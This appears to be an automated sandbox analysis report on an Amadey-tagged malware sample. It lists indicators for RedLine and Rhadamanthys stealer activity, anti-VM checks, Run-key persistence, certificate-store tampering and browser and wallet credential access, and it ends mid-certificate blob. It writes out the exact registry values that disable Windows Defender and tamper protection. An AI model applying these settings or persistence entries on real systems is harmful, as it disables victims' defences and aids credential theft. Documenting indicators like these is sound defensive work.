amadey | feedf9abf801043ab45f78a7ce7f66e37fe869ed9fd14a1e63dfc85d454d0ffc

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

tz1157.exev2583uL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	tz1157.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	tz1157.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	tz1157.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	v2583uL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	v2583uL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	tz1157.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	tz1157.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	tz1157.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	v2583uL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	v2583uL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	v2583uL.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 21 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1988-148-0x00000000023A0000-0x00000000023E6000-memory.dmp	family_redline
behavioral1/memory/1988-149-0x0000000002420000-0x0000000002464000-memory.dmp	family_redline
behavioral1/memory/1988-150-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-151-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-153-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-155-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-157-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-159-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-161-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-163-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-165-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-167-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-169-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-171-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-173-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-177-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-175-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-183-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-181-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-179-0x0000000002420000-0x000000000245E000-memory.dmp	family_redline
behavioral1/memory/1988-1059-0x0000000004D20000-0x0000000004D60000-memory.dmp	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Enumerates VirtualBox registry keys 2 TTPs 5 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse	serv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService	serv.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	serv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	serv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	serv.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

serv.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions serv.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

39 548 powershell.exe
40 548 powershell.exe
Downloads MZ/PE file
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

serv.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	serv.exe

flow	pid	process
39	548	powershell.exe
40	548	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	serv.exe

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

serv.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	serv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	serv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	serv.exe

Executes dropped EXE 21 IoCs

Processes:

zap7090.exezap7497.exezap1297.exetz1157.exev2583uL.exew68GN42.exexeHYI50.exey65JT16.exelegenda.exeworld.exeserv.exesvchost.exelegenda.exeYJROPMCQjRX9.exeDownloader.exemyp.execlip.exeDownloader.exemyp.execlip.exesqlcmd.exe

pid	process
840	zap7090.exe
756	zap7497.exe
268	zap1297.exe
1000	tz1157.exe
1996	v2583uL.exe
1988	w68GN42.exe
1956	xeHYI50.exe
1992	y65JT16.exe
1016	legenda.exe
1736	world.exe
1948	serv.exe
512	svchost.exe
840	legenda.exe
336	YJROPMCQjRX9.exe
520	Downloader.exe
1904	myp.exe
1600	clip.exe
2044	Downloader.exe
856	myp.exe
872	clip.exe
1608	sqlcmd.exe

Loads dropped DLL 51 IoCs

Processes:

a896f1696e17908b35191251050dcbf5.exezap7090.exezap7497.exezap1297.exev2583uL.exew68GN42.exexeHYI50.exey65JT16.exelegenda.exeworld.exeserv.exerundll32.exesvchost.exeYJROPMCQjRX9.exeDownloader.exemyp.execlip.exeDownloader.exemyp.execlip.exesqlcmd.exe

pid	process
1984	a896f1696e17908b35191251050dcbf5.exe
840	zap7090.exe
840	zap7090.exe
756	zap7497.exe
756	zap7497.exe
268	zap1297.exe
268	zap1297.exe
268	zap1297.exe
268	zap1297.exe
1996	v2583uL.exe
756	zap7497.exe
756	zap7497.exe
1988	w68GN42.exe
840	zap7090.exe
1956	xeHYI50.exe
1984	a896f1696e17908b35191251050dcbf5.exe
1992	y65JT16.exe
1992	y65JT16.exe
1016	legenda.exe
1016	legenda.exe
1736	world.exe
1016	legenda.exe
1016	legenda.exe
1948	serv.exe
1776	rundll32.exe
1776	rundll32.exe
1776	rundll32.exe
1776	rundll32.exe
1016	legenda.exe
1016	legenda.exe
512	svchost.exe
1016	legenda.exe
336	YJROPMCQjRX9.exe
1016	legenda.exe
1016	legenda.exe
520	Downloader.exe
520	Downloader.exe
1904	myp.exe
520	Downloader.exe
520	Downloader.exe
1600	clip.exe
1016	legenda.exe
1016	legenda.exe
2044	Downloader.exe
2044	Downloader.exe
856	myp.exe
2044	Downloader.exe
2044	Downloader.exe
872	clip.exe
1016	legenda.exe
1608	sqlcmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000123001\clip.exe	upx
behavioral1/memory/1600-1316-0x0000000000E70000-0x000000000163F000-memory.dmp	upx
behavioral1/memory/872-1338-0x0000000000CE0000-0x00000000014AF000-memory.dmp	upx
behavioral1/memory/1600-1369-0x0000000000E70000-0x000000000163F000-memory.dmp	upx

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

tz1157.exev2583uL.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	tz1157.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	tz1157.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	v2583uL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	v2583uL.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 17 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

zap7090.exezap7497.exeDownloader.exea896f1696e17908b35191251050dcbf5.exeDownloader.exezap1297.execlip.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	zap7090.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap7497.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	a896f1696e17908b35191251050dcbf5.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	Downloader.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	Downloader.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap1297.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	zap1297.exe
Key created	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run	Downloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	a896f1696e17908b35191251050dcbf5.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	zap7090.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	zap7497.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run\clip.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000123001\\clip.exe"	clip.exe
Key created	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run	Downloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run\Meteorite = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Meteorite.exe"	Downloader.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

serv.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	serv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	serv.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

serv.exe

pid process

1948 serv.exe
1948 serv.exe
1948 serv.exe
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

serv.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN serv.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1948	serv.exe
1948	serv.exe
1948	serv.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	serv.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

serv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	serv.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

640 schtasks.exe

pid	process
640	schtasks.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

legenda.exesqlcmd.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	legenda.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	legenda.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	sqlcmd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	sqlcmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sqlcmd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sqlcmd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6